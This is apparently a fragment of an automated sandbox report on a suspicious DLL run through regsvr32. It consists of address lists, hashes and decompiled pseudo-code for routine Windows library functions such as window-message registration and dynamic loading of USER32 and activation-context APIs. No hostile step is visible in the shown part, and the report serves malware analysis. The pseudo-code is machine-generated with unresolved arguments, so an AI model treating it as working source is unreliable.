                                                                              0x1001ebb6
                                                                              0x1001ebca
                                                                              0x1001ebcd
                                                                              0x1001ebcd
                                                                              0x1001ebd3
                                                                              0x1001ebda
                                                                              0x1001ec83
                                                                              0x1001ebe5
                                                                              0x1001ebe8
                                                                              0x1001ed5d
                                                                              0x1001ed5d
                                                                              0x1001ed62
                                                                              0x1001ed63
                                                                              0x1001ed6c
                                                                              0x1001ed73
                                                                              0x1001ed84
                                                                              0x1001ed8c
                                                                              0x1001ed95
                                                                              0x1001ed9c
                                                                              0x1001eda5
                                                                              0x1001eda5
                                                                              0x1001edab
                                                                              0x1001edb6
                                                                              0x1001edb6
                                                                              0x1001edc0
                                                                              0x1001edc6
                                                                              0x1001edcc
                                                                              0x1001edd1
                                                                              0x1001edd7
                                                                              0x1001eddf
                                                                              0x1001eddf
                                                                              0x1001edec
                                                                              0x1001edfb
                                                                              0x1001edfb
                                                                              0x1001ee01
                                                                              0x1001ee0a
                                                                              0x1001ee12
                                                                              0x1001ee1a
                                                                              0x1001ee20
                                                                              0x1001ee2b
                                                                              0x1001ee3b
                                                                              0x00000000
                                                                              0x1001ee42
                                                                              0x1001ebee
                                                                              0x1001ebf3
                                                                              0x1001ebf9
                                                                              0x1001ed57
                                                                              0x1001ed5c
                                                                              0x00000000
                                                                              0x1001ed5c
                                                                              0x1001ec0a
                                                                              0x1001ec0e
                                                                              0x1001ec0e
                                                                              0x1001ec19
                                                                              0x1001ec1b
                                                                              0x1001ec1b
                                                                              0x1001ec2c
                                                                              0x1001ec3f
                                                                              0x1001ec41
                                                                              0x1001ec41
                                                                              0x1001ec49
                                                                              0x1001ec58
                                                                              0x1001ec63
                                                                              0x1001ec67
                                                                              0x1001ec6d
                                                                              0x1001ec70
                                                                              0x1001ec7b
                                                                              0x1001ec7b
                                                                              0x1001ec58
                                                                              0x1001ec80
                                                                              0x1001ec80
                                                                              0x1001ec8f
                                                                              0x1001ec93
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001ec99
                                                                              0x1001eca2
                                                                              0x1001eca9
                                                                              0x1001ecb4
                                                                              0x1001ecbf
                                                                              0x1001ecc2
                                                                              0x1001eccc
                                                                              0x1001ecd5
                                                                              0x1001ecd9
                                                                              0x1001ece1
                                                                              0x1001ece1
                                                                              0x1001ece5
                                                                              0x1001ecf1
                                                                              0x1001ecf7
                                                                              0x1001ecf7
                                                                              0x1001ecfe
                                                                              0x1001ed0d
                                                                              0x1001ed11
                                                                              0x1001ed18
                                                                              0x1001ed24
                                                                              0x1001ed2c
                                                                              0x1001ed32
                                                                              0x1001ed32
                                                                              0x1001ed38
                                                                              0x1001ee57
                                                                              0x1001ed3e
                                                                              0x1001ed43
                                                                              0x00000000
                                                                              0x1001ed4c

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ItemWindow$LongMenu$InvalidateRectShow$Ctrl
                                                                              • String ID:
                                                                              • API String ID: 461998371-0
                                                                              • Opcode ID: 399b4de622d08b30d6a4f60dd5d4eb7036f9a6e0aa9a8f4794c77dd899044316
                                                                              • Instruction ID: 28d36a3c79d35b791c3826431c54d294ebbc1eb308ec1d0825d975a7e8454ed1
                                                                              • Opcode Fuzzy Hash: 399b4de622d08b30d6a4f60dd5d4eb7036f9a6e0aa9a8f4794c77dd899044316
                                                                              • Instruction Fuzzy Hash: 41715936301A8086DB54EF26E8883AE37A1F789F98F568831DE4A0B754DF78D8D5C740
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10010F5C Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 158windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$Window$ClientCopyLongParent$ByteCharMessageMultiPointsSendWide
                                                                              • String ID: (
                                                                              • API String ID: 1716241123-3887548279
                                                                              • Opcode ID: 5872869917e3f4da5d915518d3e28b7d8c2ab299b1e1b2d66768d52a257750ff
                                                                              • Instruction ID: 3205b912f4ef5c248f520d1234b658ce41910c45daa8697368103f5741e6157f
                                                                              • Opcode Fuzzy Hash: 5872869917e3f4da5d915518d3e28b7d8c2ab299b1e1b2d66768d52a257750ff
                                                                              • Instruction Fuzzy Hash: 7C51933631468187DA64CB29E94979EB762F789BC4F554020EB8A47F48DFBDE8858F00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10038AEC Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 128registrywindowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 72%
                                                                              			E10038AEC(void* __ebx, void* __ecx, void* __edx, void* __esi, signed short __ebp, intOrPtr* __rax, void* __rcx, void* __r8, long long __r9, void* __r11) {
				void* __rbx;
				signed short _t15;
				void* _t27;
				void* _t37;
				signed short _t40;
				intOrPtr* _t42;
				intOrPtr _t44;
				void* _t48;
				intOrPtr* _t49;
				intOrPtr* _t72;
				long long _t73;

				_t79 = __r11;
				_t74 = __r8;
				_t42 = __rax;
				_t40 = __ebp;
				_t38 = __esi;
				_t33 = __edx;
				_t32 = __ecx;
				_t31 = __ebx;
				_t73 = __r9;
				_t37 = __edx;
				_t48 = __rcx;
				if(__rcx != 0) {
					_t69 = 0x10009864;
					E10028C74(__ebx, __ecx, __edx, __esi, __rax, 0x10071330, 0x10009864, __r8, __r9, __r11);
					__eflags = _t42;
					_t72 = _t42;
					if(_t42 == 0) {
						E10016544();
						asm("int3");
					}
					__eflags =  *((long long*)(_t42 + 0x30));
					if( *((long long*)(_t42 + 0x30)) != 0) {
						E10011844(_t31, _t32, _t38, _t42, _t48, _t69, _t79);
						__eflags = _t42;
						if(_t42 == 0) {
							_t69 = _t48;
							E10012A7C(_t33, _t42,  *((intOrPtr*)(_t72 + 0x30)), _t48, _t74, _t79);
							 *((long long*)(_t72 + 0x30)) = 0;
						}
					}
					__eflags = _t37 - 0x110;
					if(_t37 != 0x110) {
						__eflags = _t37 -  *0x10074d1c; // 0x0
						if(__eflags == 0) {
							r9d = 0;
							__eflags = r9d;
							r8d = 0xe146;
							return SendMessageW(??, ??, ??, ??);
						}
						__eflags = _t37 - 0x111;
						if(_t37 == 0x111) {
							__eflags = r12w - 0x40e;
							if (r12w == 0x40e) goto L26;
						}
						__eflags = _t37 - 0xc000;
						if(_t37 < 0xc000) {
							goto L1;
						} else {
							E10011844(_t31, _t32, 0x110, _t42, _t48, _t69, _t79);
							__eflags = _t42;
							_t49 = _t42;
							if(_t42 == 0) {
								goto L1;
							}
							_t15 = E100298B0(_t42, _t49, _t42, 0x1005d228);
							__eflags = _t15;
							if(__eflags == 0) {
								L17:
								__eflags = _t37 -  *0x10074d10; // 0x0
								if(__eflags != 0) {
									__eflags = _t37 -  *0x10074d14; // 0x0
									if(__eflags != 0) {
										__eflags = _t37 -  *0x10074d0c; // 0x0
										if(__eflags != 0) {
											__eflags = _t37 -  *0x10074d18; // 0x0
											if(__eflags != 0) {
												goto L1;
											}
											_t44 =  *_t49;
											 *((intOrPtr*)(_t44 + 0x2b8))();
											L21:
											return _t44;
										}
										r8d = _t40 & 0x0000ffff;
										r9d = _t15 & 0x0000ffff;
										 *((intOrPtr*)( *_t49 + 0x2c8))();
										goto L1;
									}
									_t44 =  *_t49;
									 *((long long*)(_t49 + 0x388)) = _t73;
									 *((intOrPtr*)(_t44 + 0x2c0))();
									 *((long long*)(_t49 + 0x388)) = 0;
									goto L21;
								}
								return  *((intOrPtr*)( *_t49 + 0x2b8))();
							}
							_t15 = E10037EFC(_t15, _t49);
							asm("bt dword [eax+0x60], 0x13");
							if(__eflags < 0) {
								goto L1;
							}
							goto L17;
						}
					} else {
						 *0x10074d0c = RegisterWindowMessageW();
						 *0x10074d10 = RegisterWindowMessageW(??);
						 *0x10074d14 = RegisterWindowMessageW(??);
						 *0x10074d18 = RegisterWindowMessageW(??);
						 *0x10074d1c = RegisterWindowMessageW(??);
						 *0x10074d20 = RegisterWindowMessageW(??);
						_t27 = E10027778(_t31, _t32, 0x110, 0x110, _t42, _t48, _t69, _t79);
						return _t27;
					}
				}
				L1:
				return 0;
			}














                                                                              0x10038aec
                                                                              0x10038aec
                                                                              0x10038aec
                                                                              0x10038aec
                                                                              0x10038aec
                                                                              0x10038aec
                                                                              0x10038aec
                                                                              0x10038aec
                                                                              0x10038afa
                                                                              0x10038b00
                                                                              0x10038b02
                                                                              0x10038b05
                                                                              0x10038b0e
                                                                              0x10038b1c
                                                                              0x10038b21
                                                                              0x10038b24
                                                                              0x10038b27
                                                                              0x10038b29
                                                                              0x10038b2e
                                                                              0x10038b2e
                                                                              0x10038b2f
                                                                              0x10038b34
                                                                              0x10038b39
                                                                              0x10038b3e
                                                                              0x10038b41
                                                                              0x10038b47
                                                                              0x10038b4a
                                                                              0x10038b4f
                                                                              0x10038b4f
                                                                              0x10038b41
                                                                              0x10038b5c
                                                                              0x10038b5e
                                                                              0x10038bed
                                                                              0x10038bf8
                                                                              0x10038ce0
                                                                              0x10038ce0
                                                                              0x10038ce3
                                                                              0x00000000
                                                                              0x10038cf2
                                                                              0x10038bfe
                                                                              0x10038c00
                                                                              0x10038c02
                                                                              0x10038c08
                                                                              0x10038c08
                                                                              0x10038c0e
                                                                              0x10038c14
                                                                              0x00000000
                                                                              0x10038c1a
                                                                              0x10038c1d
                                                                              0x10038c22
                                                                              0x10038c25
                                                                              0x10038c28
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10038c38
                                                                              0x10038c3d
                                                                              0x10038c3f
                                                                              0x10038c54
                                                                              0x10038c54
                                                                              0x10038c5a
                                                                              0x10038c70
                                                                              0x10038c76
                                                                              0x10038c9a
                                                                              0x10038ca0
                                                                              0x10038cc6
                                                                              0x10038ccc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10038cd2
                                                                              0x10038cd8
                                                                              0x10038c96
                                                                              0x00000000
                                                                              0x10038c96
                                                                              0x10038ca8
                                                                              0x10038cb6
                                                                              0x10038cba
                                                                              0x00000000
                                                                              0x10038cba
                                                                              0x10038c78
                                                                              0x10038c7e
                                                                              0x10038c85
                                                                              0x10038c8b
                                                                              0x00000000
                                                                              0x10038c8b
                                                                              0x00000000
                                                                              0x10038c65
                                                                              0x10038c44
                                                                              0x10038c49
                                                                              0x10038c4e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10038c4e
                                                                              0x10038b64
                                                                              0x10038b78
                                                                              0x10038b8b
                                                                              0x10038b9e
                                                                              0x10038bb1
                                                                              0x10038bc4
                                                                              0x10038bdb
                                                                              0x10038be1
                                                                              0x00000000
                                                                              0x10038be1
                                                                              0x10038b5e
                                                                              0x10038b07
                                                                              0x00000000

                                                                              APIs
                                                                              • RegisterWindowMessageW.USER32 ref: 10038B6B
                                                                              • RegisterWindowMessageW.USER32 ref: 10038B7E
                                                                              • RegisterWindowMessageW.USER32 ref: 10038B91
                                                                              • RegisterWindowMessageW.USER32 ref: 10038BA4
                                                                              • RegisterWindowMessageW.USER32 ref: 10038BB7
                                                                              • RegisterWindowMessageW.USER32 ref: 10038BCA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: MessageRegisterWindow
                                                                              • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                                                                              • API String ID: 1814269913-3888057576
                                                                              • Opcode ID: ca819c808433432f2172e461df2da1b592a04694507b7583e10203630466fab9
                                                                              • Instruction ID: 0e0071ee473e4a5d7a9b5c20dd638cd036ff92999e9372ddeee58aba60f34863
                                                                              • Opcode Fuzzy Hash: ca819c808433432f2172e461df2da1b592a04694507b7583e10203630466fab9
                                                                              • Instruction Fuzzy Hash: 28518B757017468AEF26DB21EC5439873A0F788B8AF564062CD8A4B720DF7CEA85C710
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10024734 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 121libraryloaderregistryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$CloseHandleModuleOpenQueryValue
                                                                              • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                              • API String ID: 380410164-2424895508
                                                                              • Opcode ID: a79036c1b764c25d8350b04b9100b49a7b08208e7cffe22db10c1c6d0dd84d31
                                                                              • Instruction ID: 6fd1476344339f077d48eb474ebd9cc259f24a23153cab10f3da9c525eb1a62c
                                                                              • Opcode Fuzzy Hash: a79036c1b764c25d8350b04b9100b49a7b08208e7cffe22db10c1c6d0dd84d31
                                                                              • Instruction Fuzzy Hash: 5A515572601BC582EB42CB10F88438977F0F789B98F930125DA9946BA4EFBDD4C9CB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10048220 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 140libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 52%
                                                                              			E10048220(void* __edx, void* __eflags, long long __rbx, void* __rcx, char* __rdx, long long __rdi, long long __rsi, long long __rbp, char* __r8, void* __r9, long long __r12, long long __r13, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _v8;
				void* _v16;
				signed int _v32;
				char _v40;
				char _v48;
				char _v52;
				char _v56;
				long long _v72;
				signed int _t28;
				void* _t30;
				void* _t34;
				_Unknown_base(*)()* _t37;
				void* _t52;
				void* _t54;
				long long _t56;
				long long _t57;
				long long _t60;
				long long _t61;
				long long _t62;
				long long _t64;
				long long _t67;
				long long _t89;
				long long _t93;
				long long _t94;
				long long _t95;

				_t96 = __r8;
				_t86 = __rdi;
				_t82 = __rdx;
				_t57 = __rbx;
				_t56 = _t95;
				 *((long long*)(_t56 + 8)) = __rbx;
				 *((long long*)(_t56 + 0x10)) = __rbp;
				 *((long long*)(_t56 + 0x18)) = __rsi;
				 *((long long*)(_t56 + 0x20)) = __rdi;
				 *((long long*)(_t56 - 8)) = __r12;
				 *((long long*)(_t56 - 0x10)) = __r13;
				_t52 = r8d;
				_t28 = E1003CD90(_t56);
				_t54 =  *0x10075ba8 - _t57; // 0x0
				_t89 = _t56;
				_v56 = 0;
				_v52 = 0;
				if(_t54 != 0) {
					L9:
					_t60 =  *0x10075bc0; // 0x0
					__eflags = _t60 - _t89;
					if(_t60 == _t89) {
						L19:
						_t61 =  *0x10075bb0; // 0x0
						__eflags = _t61 - _t89;
						if(_t61 != _t89) {
							E1003CDF0(_t28, _t56, _t61);
							_t28 =  *_t56();
							__eflags = _t56;
							_t57 = _t56;
							if(_t56 != 0) {
								_t64 =  *0x10075bb8; // 0x0
								__eflags = _t64 - _t89;
								if(_t64 != _t89) {
									E1003CDF0(_t28, _t56, _t64);
									_t28 =  *_t56();
									_t57 = _t56;
								}
							}
						}
						L23:
						_t62 =  *0x10075ba8; // 0x0
						E1003CDF0(_t28, _t56, _t62);
						r9d = _t52;
						_t30 =  *_t56();
						L24:
						return _t30;
					}
					__eflags =  *0x10075bc8 - _t89; // 0x0
					if(__eflags == 0) {
						goto L19;
					}
					E1003CDF0(_t28, _t56, _t60);
					_t34 =  *_t56();
					__eflags = _t56;
					_t93 = _t56;
					if(_t56 == 0) {
						L14:
						_t28 = E1003B440(_t56, _t57,  &_v52, _t82, _t86, _t89, _t93, _t96);
						__eflags = _t28;
						if(_t28 != 0) {
							r9d = 0;
							r8d = 0;
							__eflags = 0;
							_v72 = _t57;
							_t28 = E1003C6F0(0, _t82, _t96);
						}
						__eflags = _v52 - 4;
						if(_v52 < 4) {
							asm("bts edi, 0x12");
						} else {
							asm("bts edi, 0x15");
						}
						goto L23;
					}
					_t67 =  *0x10075bc8; // 0x0
					E1003CDF0(_t34, _t56, _t67);
					r9d = 0xc;
					_v72 =  &_v48;
					_t96 =  &_v40;
					_t28 =  *_t56();
					__eflags = _t28;
					if(_t28 == 0) {
						goto L14;
					}
					__eflags = _v32 & 0x00000001;
					if((_v32 & 0x00000001) != 0) {
						goto L19;
					}
					goto L14;
				}
				LoadLibraryA();
				_t94 = _t56;
				if(_t56 != 0) {
					_t37 = GetProcAddress();
					__eflags = _t56;
					if(_t56 == 0) {
						goto L2;
					} else {
						E1003CD20(_t37, _t56, _t56);
						 *0x10075ba8 = _t56;
						E1003CD20(GetProcAddress(??, ??), _t56, _t56);
						_t82 = "GetLastActivePopup";
						 *0x10075bb0 = _t56;
						E1003CD20(GetProcAddress(??, ??), _t56, _t56);
						 *0x10075bb8 = _t56;
						_t28 = E1003B3F0(_t56, __rbx,  &_v56, "GetLastActivePopup", __rdi, _t89, _t94, __r8);
						__eflags = _t28;
						if(_t28 != 0) {
							r9d = 0;
							r8d = 0;
							__eflags = 0;
							_v72 = __rbx;
							_t28 = E1003C6F0(0, "GetLastActivePopup", __r8);
						}
						__eflags = _v56 - 2;
						if(_v56 == 2) {
							_t82 = "GetUserObjectInformationA";
							_t28 = E1003CD20(GetProcAddress(??, ??), _t56, _t56);
							__eflags = _t56;
							 *0x10075bc8 = _t56;
							if(_t56 != 0) {
								_t82 = "GetProcessWindowStation";
								_t28 = E1003CD20(GetProcAddress(??, ??), _t56, _t56);
								 *0x10075bc0 = _t56;
							}
						}
						goto L9;
					}
				}
				L2:
				_t30 = 0;
				goto L24;
			}




























                                                                              0x10048220
                                                                              0x10048220
                                                                              0x10048220
                                                                              0x10048220
                                                                              0x10048220
                                                                              0x10048227
                                                                              0x1004822b
                                                                              0x1004822f
                                                                              0x10048233
                                                                              0x10048237
                                                                              0x1004823b
                                                                              0x10048242
                                                                              0x10048248
                                                                              0x1004824f
                                                                              0x10048256
                                                                              0x10048259
                                                                              0x1004825d
                                                                              0x10048261
                                                                              0x10048351
                                                                              0x10048351
                                                                              0x10048358
                                                                              0x1004835b
                                                                              0x100483e3
                                                                              0x100483e3
                                                                              0x100483ea
                                                                              0x100483ed
                                                                              0x100483ef
                                                                              0x100483f4
                                                                              0x100483f6
                                                                              0x100483f9
                                                                              0x100483fc
                                                                              0x100483fe
                                                                              0x10048405
                                                                              0x10048408
                                                                              0x1004840a
                                                                              0x10048412
                                                                              0x10048414
                                                                              0x10048414
                                                                              0x10048408
                                                                              0x100483fc
                                                                              0x10048417
                                                                              0x10048417
                                                                              0x1004841e
                                                                              0x10048423
                                                                              0x1004842f
                                                                              0x10048431
                                                                              0x10048459
                                                                              0x10048459
                                                                              0x10048361
                                                                              0x10048368
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004836a
                                                                              0x1004836f
                                                                              0x10048371
                                                                              0x10048374
                                                                              0x10048377
                                                                              0x100483ae
                                                                              0x100483b3
                                                                              0x100483b8
                                                                              0x100483ba
                                                                              0x100483bc
                                                                              0x100483bf
                                                                              0x100483c4
                                                                              0x100483c6
                                                                              0x100483cb
                                                                              0x100483cb
                                                                              0x100483d0
                                                                              0x100483d5
                                                                              0x100483dd
                                                                              0x100483d7
                                                                              0x100483d7
                                                                              0x100483d7
                                                                              0x00000000
                                                                              0x100483d5
                                                                              0x10048379
                                                                              0x10048380
                                                                              0x1004838a
                                                                              0x10048390
                                                                              0x10048399
                                                                              0x100483a1
                                                                              0x100483a3
                                                                              0x100483a5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100483a7
                                                                              0x100483ac
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100483ac
                                                                              0x1004826e
                                                                              0x10048277
                                                                              0x1004827a
                                                                              0x1004828d
                                                                              0x10048293
                                                                              0x10048296
                                                                              0x00000000
                                                                              0x10048298
                                                                              0x1004829b
                                                                              0x100482aa
                                                                              0x100482ba
                                                                              0x100482bf
                                                                              0x100482c9
                                                                              0x100482d9
                                                                              0x100482e3
                                                                              0x100482ea
                                                                              0x100482ef
                                                                              0x100482f1
                                                                              0x100482f3
                                                                              0x100482f6
                                                                              0x100482fb
                                                                              0x100482fd
                                                                              0x10048302
                                                                              0x10048302
                                                                              0x10048307
                                                                              0x1004830c
                                                                              0x1004830e
                                                                              0x10048321
                                                                              0x10048326
                                                                              0x10048329
                                                                              0x10048330
                                                                              0x10048332
                                                                              0x10048345
                                                                              0x1004834a
                                                                              0x1004834a
                                                                              0x10048330
                                                                              0x00000000
                                                                              0x1004830c
                                                                              0x10048296
                                                                              0x1004827c
                                                                              0x1004827c
                                                                              0x00000000

                                                                              APIs
                                                                                • Part of subcall function 1003CD90: FlsGetValue.KERNEL32(?,?,?,?,1004824D), ref: 1003CD9F
                                                                              • LoadLibraryA.KERNEL32 ref: 1004826E
                                                                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,1003E6BB), ref: 1004828D
                                                                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,1003E6BB), ref: 100482B1
                                                                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,1003E6BB), ref: 100482D0
                                                                              • GetProcAddress.KERNEL32 ref: 10048318
                                                                              • GetProcAddress.KERNEL32 ref: 1004833C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoadValue
                                                                              • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                              • API String ID: 3789089765-232180764
                                                                              • Opcode ID: 326c3b78813d110d02f10094d4fe5e9494a6a42cb1adf5cb3ddf84c575781cac
                                                                              • Instruction ID: 3a37bb2f6c319c083678d81276384649f988e8526b49e7ddac67ad36f2414e4c
                                                                              • Opcode Fuzzy Hash: 326c3b78813d110d02f10094d4fe5e9494a6a42cb1adf5cb3ddf84c575781cac
                                                                              • Instruction Fuzzy Hash: 68519E35202B8189EA56DF52B8547AD73A0F789B85F944439EECE87B14DFBCE680C704
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100531C8 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 200libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                                              • String ID: H
                                                                              • API String ID: 948315288-2852464175
                                                                              • Opcode ID: 3fdd66815262856e978331c32be566da885a671e5fcb644f126aa22bbba4d5c4
                                                                              • Instruction ID: dab0caed4555b77c03a630382018286634117295fd1dbabc9fa9bacfb5356d3f
                                                                              • Opcode Fuzzy Hash: 3fdd66815262856e978331c32be566da885a671e5fcb644f126aa22bbba4d5c4
                                                                              • Instruction Fuzzy Hash: FD818B32305B858ADB56CF45E844399B7A1F748BC8F468129DA8D47B24EF7DE949CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1004B970 Relevance: 16.9, APIs: 11, Instructions: 353COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 26%
                                                                              			E1004B970(int __edx, void* __esi, signed long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, int __r9, void* __r10, void* __r11, long long __r12, long long __r13, long long __r14, long long __r15) {
				int _t107;
				int _t114;
				void* _t117;
				int _t119;
				signed int _t124;
				signed int _t125;
				signed int _t130;
				signed int _t131;
				int _t135;
				int _t138;
				int _t141;
				int _t144;
				void* _t158;
				int _t170;
				signed int _t182;
				signed int _t190;
				signed long long _t195;
				signed long long _t196;
				signed long long _t199;
				signed long long _t200;
				signed long long _t202;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;
				intOrPtr* _t217;
				void* _t218;
				intOrPtr* _t220;
				signed long long _t222;
				signed long long _t223;
				signed long long _t224;
				signed long long _t226;
				signed long long _t229;
				signed long long _t230;
				void* _t231;
				void* _t232;
				intOrPtr* _t234;
				int _t248;
				void* _t250;
				void* _t251;
				signed long long _t253;
				signed long long _t255;
				intOrPtr* _t259;
				signed long long _t261;
				signed long long _t262;
				signed long long _t265;

				_t263 = __r15;
				_t256 = __r13;
				_t251 = __r11;
				_t250 = __r10;
				_t246 = __r9;
				_t227 = __rsi;
				_t218 = __rdx;
				_t202 = __rbx;
